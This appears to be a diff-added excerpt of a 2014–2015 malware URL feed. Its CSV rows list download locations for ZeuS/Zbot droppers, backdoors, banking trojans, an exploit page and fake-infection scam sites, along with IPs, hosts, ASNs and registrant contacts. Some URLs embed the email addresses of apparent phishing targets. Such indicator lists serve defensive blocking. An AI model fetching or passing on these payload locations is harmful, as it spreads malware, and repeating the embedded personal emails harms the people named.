+"2014/05/27_04:02","innatek.com/ListinoPrezzi.zip?SEmfjmWrPDXEz","63.111.67.9","ns3.actwd.net.","Trojan.Zbot","Registrar Abuse Contact abuse@web.com","11486","0","US", +"2014/05/27_04:02","hobbat.fvds.ru/DHL%20Document.zip","82.146.42.130","hobbat.fvds.ru.","Trojan.Zbot","-","29182","0","RU", +"2014/05/27_04:02","hobbat.fvds.ru/DHL","82.146.42.130","hobbat.fvds.ru.","Document.zip Trojan.Email.Gen","-","29182","0","RU", +"2014/05/27_04:02","hnskorea.co.kr/alberta/dingo.exe","203.242.210.105","exp1.ecplaza.net.","Trojan.Agent.ED","-","7557","0","KR", +"2014/05/27_04:02","grendizer.biz/statistiche/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","gulf-industrial.com/images/2103USa.qta","91.103.216.110","secure.dfsv66.com.","Trojan.Downloader","Registrar Abuse Contact abuse@enom.com","29550","0","GB", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/statistiche.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/ordine4582923332.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Info.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/statistiche.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/ordine4582923332.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/statistiche/fattura05032014.zip?qgbaprb3jqghxxof","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfriniatfastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfrini+at+fastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfrini%20at%20fastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejre=","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip?xx0frhnydqgzvzfzugbs5xm","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip?uiukcav35d","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/statistiche.zip?vfw=","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/statistiche.zip?vfww8lyfaiccpr_elke.staiger+at+fdp.landtag-bw.de","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/ordine4582923332.zip?boweipzoa374cr_info@bikesplaza.nl","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Info.zip?17kDYCBNi6t","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Fattura05032014.zip?zav6BNgeGvW89WPVOQlRX","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/statistiche.zip?l7ucqay9bgq6i6sk","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/ordine4582923332.zip?vybhzpsoxzapz0xdt","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?jwui91zljfn","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?dzmooxysgf3yt6ju2ehhm","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?9hq3vacty6ggvex","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","go-quicky.com/admin_old_dev/css/1504USd.exe","162.210.70.39","162.210.70-39.confluence-networks.com.","Spyware.Zbot","Registrar Abuse Contact abuse@domrobot.com","40034","0","VG", +"2014/05/27_04:02","dougmlee.com/DHL","50.21.187.135","s15569399.onlinehome-server.com.","Document.zip Trojan.Email.Gen","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/05/27_04:02","directxex.com/uploads/919691940.p-update.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","dougmlee.com/DHL%20Document.zip","50.21.187.135","s15569399.onlinehome-server.com.","Trojan.Zbot","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/05/27_04:02","directxex.com/uploads/610411940.save.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/535825339.androm.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/2139980916.S4_Crack.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/42238721.Amazon","5.135.127.68","-","Rechnungs Tool.exe Backdoor.Bot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/2050276296.scan0001.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1627320498.runerr.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/164923136.cpu.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1257844607.encrcyper.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1149332910.Host2_crypter_05.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","destre45.com/p/svhost.exe","193.203.50.51","-","Trojan.Agent.ED","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2014/05/27_04:02","directxex.com/uploads/100312839.CryptocurrencyTradingBotV1.4.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","destre45.com/p/f.exe","193.203.50.51","-","Trojan.Agent.ED","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip","109.203.112.170","-","Trojan.Extension.Exploit","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", +"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip?formazione@feldenkrais.it","109.203.112.170","-","Trojan.Zbot","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", +"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip?formazione%20at%20feldenkrais.it","109.203.112.170","-","Trojan.Zbot","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", +"2014/05/27_04:02","decrolyschool.be/backup/1_1_777.exe","217.21.184.230","linweb003.webhosting.be.","Trojan.Agent.ED","Not shown, please visit www.dns.be for webbased whois. / info@my-websitebuilder.com","34762","0","BE", +"2014/05/27_04:02","decografix.com/wp-content/uploads/2014/03/b41.exe","184.172.57.26","184.172.57.26-static.reverse.softlayer.com.","Trojan.Inject","Registrar Abuse Contact domainabuse@tucows.com","36351","0","US", +"2014/05/27_04:02","csmail.iggcn.com/temp/service_mail/attachments/2014/03/11/2014031105343091111.zip","66.171.200.210","-","Trojan.Downloader.RRE","-","55034","0","US", +"2014/05/27_04:02","cope.it/templates/webstat/finanzgruppe_volksbanken_ne/index","65.98.23.91","-","at cope.it-templates-webstat-finanzgruppe_volksbanken_ne.htm Trojan.Email.FakeDoc","-","25653","0","US", +"2014/05/27_04:02","csmail.iggcn.com/temp/service_mail/attachments/2014/03/11/2014031105343091111.zip","66.171.200.210","-","Trojan.Zbot","-","55034","0","US", +"2014/05/27_04:02","classicspeedway.com/ff.exe","116.0.23.229","hiruko.instanthosting.com.au.","Trojan.Zbot","Registrar Abuse Contact domains@crazydomains.com","9280","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Estratto/Dati.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Dettagli_Fatture.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Conto.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Estratto/Dati.zip","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Dettagli_Fatture.zip?aladinodepaulis@uniadriatica.it","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Conto.zip?gZ5lXOdeRY7y","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","americancareconcept.com/modules/webstat/rechnungonline_telekom_rt/2014_05_rechnungonline_8290155236sign.zip","198.98.102.215","215.0-24.102.98.198.in-addr.arpa.","Trojan.Email.FakeDoc","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18978","0","US", +"2014/05/27_04:02","americancareconcept.com/modules/webstat/rechnungonline_telekom_rt/2014_05_rechnungonline_8290155236sign.zip","198.98.102.215","215.0-24.102.98.198.in-addr.arpa.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18978","0","US", +"2014/05/27_04:02","amazingvacationhotels.com/wp-content/themes/HotelWeb2/connect/mac.exe","192.186.200.130","ip-192-186-200-130.ip.secureserver.net.","Trojan.Ransom.ED","-","26496","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip","dhwhiterealestate.com.","Trojan.Extension.Exploit","-","11305","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip?schuld-pdf=96498320212=areyphv@fag.de","dhwhiterealestate.com.","Trojan.Zbot","-","11305","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip?schuld-pdf=96498320212=areyphv+at+fag.de%2F","dhwhiterealestate.com.","Trojan.Zbot","-","11305","0","US", +"2014/05/27_04:02","-","185.38.249.242/b7.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/b9.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/b2.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/b5.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/a14.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/a5.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","111.26.23.2/11.exe","-","Trojan.Agent","-","9808","0","CN", +"2014/05/27_04:02","-","115.146.2.58/pqosepgfb","swqxx58.secure.ne.jp.","Spyware.ZeuS.GO","-","9597","0","JP", +"2014/05/27_04:02","-","185.38.249.242/a13.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/12_19:03","-","62.76.43.78/p2p/PP_detalis_726716942049.pdf.exe","62-76-43-78.clodo.ru.","Trojan.Zbot","-","48172","0","RU", +"2014/05/12_00:24","iwgtest.co.uk/homezinctech/wp-admin/main/adobe_flash.exe","69.28.199.10","69.28.199.10.hostpapa.com.","Spyware.Zbot.ED","IWG Ltd / -","13768","0","US", +"2014/05/12_00:24","kadirzerey.com/wp-content/themes/genegri/file.ecr","31.169.73.112","server98.tr73.dhs.com.tr.","Trojan.ZeuS","Registrar Abuse Contact abuse@ihs.com.tr","56582","0","TR", +"2014/05/12_00:24","murbil.hostei.com/wp-content/themes/Mizzo/file.ecr","31.170.160.249","-","Trojan.ZeuS","-","47583","0","US", +"2014/05/12_00:24","rentfromart.com/media/system/images/Java.exe","72.167.149.183","ip-72-167-149-183.ip.secureserver.net.","Trojan.Agent","-","26496","0","US", +"2014/05/12_00:24","tcrwharen.homepage.t-online.de/11","80.150.6.138","b2c.t-online.de.","Spyware.ZeuS","hostmaster@t-online.net","3320","0","DE", +"2014/05/12_00:24","uploads.tmweb.ru/sFAAd3uEW9.exe","92.53.118.140","ultra.timeweb.ru.","Trojan.Zbot","-","9123","0","RU", +"2014/05/12_00:24","strangeduckfilms.com/222","72.34.42.5","versace.livingdot.com.","Trojan.Crypt.NKN","Registrar Abuse Contact abuse@enom.com","33494","0","US", +"2014/05/12_00:24","citymediamagazin.hu/spacey/egress","87.229.77.23","webszerver.autofejlesztes.hu.","Spyware.ZeuS","-","61998","0","HU", +"2014/05/12_00:24","www.freemao.com/pics/file.ecr","195.110.150.4","net150-004.mclink.it.","Spyware.ZeuS.GO","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/12_00:24","citymediamagazin.hu/poniards/figurine","87.229.77.23","webszerver.autofejlesztes.hu.","Spyware.ZeuS","-","61998","0","HU", +"2014/05/12_00:24","-","181.50.248.15/webalizer/webstate/files/soft.exe","Static-IP-18150024815.cable.net.co.","Trojan.Zbot","-","10620","0","CO", +"2014/05/12_00:24","-","185.38.249.242/pl.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/12_00:24","allforlove.de/11","217.13.199.48","www28.prosite.de.","Spyware.Zbot.ED","info@speedbone.de","15657","0","DE", +"2014/05/12_00:24","adlock.in/download/371815/file.exe","192.254.137.131","adl.adlock.in.","PUP.Optional.FileServer.A","edik johnson / adminsoft4me@gmail.com","46606","0","US", +"2014/05/12_00:24","akirkpatrick.com/11","81.27.85.16","zeus7.easy-internet.co.uk.","Spyware.Zbot.ED","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","25577","0","GB", +"2014/05/12_00:24","alexanderinteriorsanddesign.com/errant/topics","162.144.87.156","server.alexanderinteriorsanddesign.com.","Spyware.ZeuS","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2014/05/12_00:24","arkinsoftware.in/images/nukotobne.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Agent.FSAVXGen","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/12_00:24","arkinsoftware.in/images/inexsabit.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Inject.ED","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/12_00:24","arkinsoftware.in/images/aveksynkens.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Zbot","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/12_00:24","beespace.com.ua/hook/hookkey.exe","91.222.136.251","web123.ukraine.com.ua.","Trojan.Agent","% =========== / -","47781","0","UA", +"2014/05/12_00:24","classicallyabsurdphotography.com/bunked/tinning","184.168.236.1","p3nlhg136c1136.shr.prod.phx3.secureserver.net.","Spyware.ZeuS","-","26496","0","US", +"2014/05/09_15:10","sadiqtv.com/111","162.253.151.131","stats.salmon.arvixe.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact compliance@domain-inc.net","36351","0","US", +"2014/05/09_15:10","rallyeair.com/111","82.102.6.32","ns2.webhs.org.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","25137","0","PT", +"2014/05/09_15:10","nbook.far.ru/111","195.16.42.37","far.ru.freehosting.centre.ru.","Trojan.Zeus.GameOver","-","3216","0","RU", +"2014/05/09_15:10","pgalvaoteles.pt/111","82.102.5.201","hosting27.serverhs.org.","Trojan.Zeus.GameOver","P. Galvão Teles - Prestação de Serviços Lda / dominios@webhs.pt","25137","0","PT", +"2014/05/09_15:10","lefos.net/111","46.4.120.118","eu3.1host.gr.","Trojan.Zeus.GameOver","-","24940","0","DE", +"2014/05/09_15:10","gogetgorgeous.com/111","103.19.89.55","cloud1.labelhosting.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@1and1.com","132717","0","IN", +"2014/05/09_15:10","decota.es/111","134.0.14.18","-","Trojan.Zeus.GameOver","-","197712","0","ES", +"2014/05/09_15:10","beautysafari.com/111","209.159.189.43","virtualmin1.vaxxine.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@namejuice.com","11181","0","CA", +"2014/05/09_15:10","caclclo.web.fc2.com/111","208.71.106.48","hps14.fc2.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/05/09_15:10","axisbuild.com/111","62.233.121.75","origin.easyspace.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@easyspace.com","20860","0","GB", +"2014/05/09_15:10","atelierprincesse.web.fc2.com/111","208.71.106.49","hps15.fc2.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/11/25_08:30","-","104.152.215.90/1.html","90-215-152-104-static.reverse.queryfoundry.net.","CVE-2014-6332 exploit","-","62638","0","US", +"2014/11/27_18:24","systemscheckusa.com/","208.94.229.238","-","Browlock.FakeInfection","moniker.com billing department / tech@moniker.com","19710","0","US", +"2014/11/27_18:24","www.email-login-support.com/index-10.html","192.186.249.4","ip-192-186-249-4.ip.secureserver.net.","Browlock.FakeInfection","Registrar Abuse Contact abuse@websitewelcome.com","26496","0","US", +"2014/11/27_18:24","97b1c56132dfcdd90f93-0c5c8388c0a5897e648f883e2c86dc72.r54.cf5.rackcdn.com/","67.135.105.184","-","Browlock.FakeInfection","Registrar Abuse Contact admin@internationaladmin.com","209","0","US", +"2014/11/27_18:24","immediateresponseforcomputer.com/index112.htm","23.229.170.164","ip-23-229-170-164.ip.secureserver.net.","Browlock.FakeInfection","-","26496","0","US", +"2014/11/27_18:24","www.consumeralternatives.org/anti-virus-check.html","64.235.60.164","lasvegas-nv-datacenter.com.","Browlock.FakeInfection","Oneandone Private Registration / proxy3263807@1and1-private-registration.com","26277","0","US", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/cra/s.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Agent","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/vvv.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Agent","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","chaveiro.bio.br/tmp/AcbtReader.exe","177.12.163.81","web943.uni5.net.","Trojan.Agent.AI","cert.br, http://www.cert.br/, respectivelly to cert@cert.br","28299","0","BR", +"2014/12/03_08:50","campamento.queenscamp.com/yuppie/staying","74.91.220.2","2.webhosting.ecommerce.com.","Trojan.Agent.CRV","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2014/12/03_08:50","ftp.flyfishusa.com/lords/vanishings","184.168.240.101","ip-184-168-240-101.ip.secureserver.net.","Trojan.Agent.CRV","Registrar Abuse Contact abuse@web.com","26496","0","US", +"2014/12/03_08:50","optimization-methods.com/Bilder/calc.exe","212.218.192.28","plesk3.nbg1.nethinks.com.","Trojan.Backdoor","Registrar Abuse Contact abuse@vautron.de","8319","0","DE", +"2014/12/03_08:50","paraskov.com/err.exe","66.154.48.2","adulttgpgallery.com.","Trojan.Backdoor","Registrant contact@privacyprotect.org","22653","0","US", +"2014/12/03_08:50","tatschke.net/hbc.exe","190.228.29.82","mx2982.godns.net.","Trojan.Backdoor","-","7303","0","AR", +"2014/12/03_08:50","wt10.haote.com/jywgxrjzd.exe","218.75.155.41","-","Trojan.Backdoor","-","4134","0","CN", +"2014/12/03_08:50","www.fiduciariobajio.com.mx/plugins/content/hltv.exe","200.76.36.93","static-200-76-36-93.alestra.net.mx.","Trojan.Backdoor","Banco del Bajio, S.A. / % by email at ayuda@nic.mx .","11172","0","MX", +"2014/12/03_08:50","cmicapui.ce.gov.br/components/com_phocadownload/helpers/modu.exe","54.228.191.94","ec2-54-228-191-94.eu-west-1.compute.amazonaws.com.","Trojan.Banker","Raimundo Osman Lima / netmaster@etice.ce.gov.br","16509","0","US", +"2014/12/03_08:50","harshwhispers.com/img/dunptty.gif","66.240.144.68","noreverse.broadspire.com.","Trojan.Banker","Registrar Abuse Contact domainabuse@tucows.com","23136","0","US", +"2014/12/03_08:50","harshwhispers.com/img/wxynts.gif","66.240.144.68","noreverse.broadspire.com.","Trojan.Banker","Registrar Abuse Contact domainabuse@tucows.com","23136","0","US", +"2014/12/03_08:50","prorodeosportmed.com/templates/atomic/html/mod_custom/default.xx","184.168.16.1","p3nlhg716c1716.shr.prod.phx3.secureserver.net.","Trojan.Banker","-","26496","0","US", +"2014/12/03_08:50","xicaxique.com.br/catalog/view/theme/default/image/image102.jpg","200.219.249.162","static.200.219.249.162.datacenter1.com.br.","Trojan.Banker.DE","Vincent Comercio Eletroeletronico Ltda / registro@br2001.com.br","16397","0","BR", +"2014/12/03_08:50","iybasketball.info/wp-content/themes/twentytwelve/lo.exe","192.186.233.104","ip-192-186-233-104.ip.secureserver.net.","Trojan.Downloader","Kent Culuko / iybball@gmail.com","26496","0","US", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/1.txt","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/12.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/20.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","hexadl.line55.net/FLV_Media_Player.exe","104.28.15.104","-","Trojan.Downloader.Agent","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/12/03_08:50","hexadl.line55.net/FLV-HD.exe","104.28.14.104","-","Trojan.Downloader.Agent","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/12/03_08:50","fbku.com/yeni/Porno-HD.exe","94.23.169.208","-","Trojan.Dropper","-","16276","0","FR", +"2014/12/03_08:50","getdatanetukscan.info/sp32_64_10044639319006172375.exe","85.17.73.28","-","Trojan.FakeMS","WhoisProtectService.net PROTECTSERVICE, LTD. / getdatanetukscan.info@whoisprotectservice.net","16265","0","NL", +"2014/12/03_08:50","getdatanetukscan.info/sp32_64_3491943367355003623.exe","85.17.73.28","-","Trojan.FakeMS","WhoisProtectService.net PROTECTSERVICE, LTD. / getdatanetukscan.info@whoisprotectservice.net","16265","0","NL", +"2014/12/03_08:50","d32k27yvyi4kmv.cloudfront.net/installer/Installer.exe","54.239.172.114","server-54-239-172-114.atl50.r.cloudfront.net.","Trojan.Injector","Registrar Abuse Contact abusecomplaints@markmonitor.com","16509","0","US", +"2014/12/03_08:50","extreembilisim.com/themes/blue/Cure.exe","188.132.231.74","cpanel2.webadam.com.","Trojan.MSIL.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42910","0","TR", +"2014/12/03_08:50","extreembilisim.com/themes/blue/panelServerCrypted.exe","188.132.231.74","cpanel2.webadam.com.","Trojan.MSIL.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42910","0","TR", +"2014/12/03_08:50","nailbytes1.com/test/86lkL2Xpxa.exe","208.109.216.59","ip-208-109-216-59.ip.secureserver.net.","Trojan.PWS","-","26496","0","US", +"2014/12/03_08:50","hoerbird.net/galerie/w4f3f4.exe","85.13.132.183","dd8432.kasserver.com.","Trojan.Zbot","Registrar Abuse Contact abuse@registrygate.com","34788","0","DE", +"2014/12/03_08:50","josip-stadler.org/11","192.185.78.65","ns105.websitewelcome.com.","Trojan.Zbot","Sasa Ivicevic / info@disnet-hosting.net","20013","0","US", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/b.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Zbot","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","chsplantsales.co.uk/werwre56","89.238.188.22","http.apache1.cp247.net.","Trojan.Zeus.GO","John D Hesketh / -","9009","0","GB", +"2014/12/03_08:50","cudacorp.com/shqgowox","192.185.235.74","-","Trojan.Zeus.GO","-","46606","0","US", +"2014/12/03_08:50","jdfabrication.com/ihfipiex","64.78.28.201","intermedia.net.","Trojan.Zeus.GO","Registrar Abuse Contact abuse@melbourneit.com.au","16406","0","US", +"2014/12/03_08:50","mueller-holz-bau.com/v28nyn27","81.169.145.161","wa1.rzone.de.","Trojan.Zeus.GO","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/12/03_08:50","perfectionautorepairs.com/jkcokunrh","66.147.244.51","box751.bluehost.com.","Trojan.Zeus.GO","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2014/12/03_08:50","pharmadeal.gr/nfqnaanl","64.71.131.228","228.224-28.131.71.64.in-addr.arpa.","Trojan.Zeus.GO","-","6939","0","US", +"2014/12/03_08:50","testtralala.xorg.pl/s6i8yn","193.203.99.114","ip-99-114.redefine.pl.","Trojan.Zeus.GO","domeny@ConsultingService.pl","47303","0","PL", +"2014/12/03_08:50","www.super8service.de/zf0yx","81.169.145.164","wa4.rzone.de.","Trojan.Zeus.GO","hostmaster@strato.de","6724","0","DE", +"2014/12/17_21:01","whitehorsetechnologies.net/images/clients/x/mail.php","208.91.199.150","bh-7.webhostbox.net.","Destination of banking phishing","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","19905","0","VG", +"2015/01/08_08:12","-","109.87.242.9/pod2/beo1bw3.exe","9.242.87.109.triolan.net.","Trojan.Downloader","-","13188","0","UA", +"2015/01/08_08:12","-","37.221.162.57/pod1/sdhfjkl.exe","lh20471.voxility.net.","Trojan.Downloader","-","39743","0","RO", +"2015/01/08_08:12","-","37.221.162.57/pod2/beo1bw3.exe","lh20471.voxility.net.","Trojan.Downloader","-","39743","0","RO", 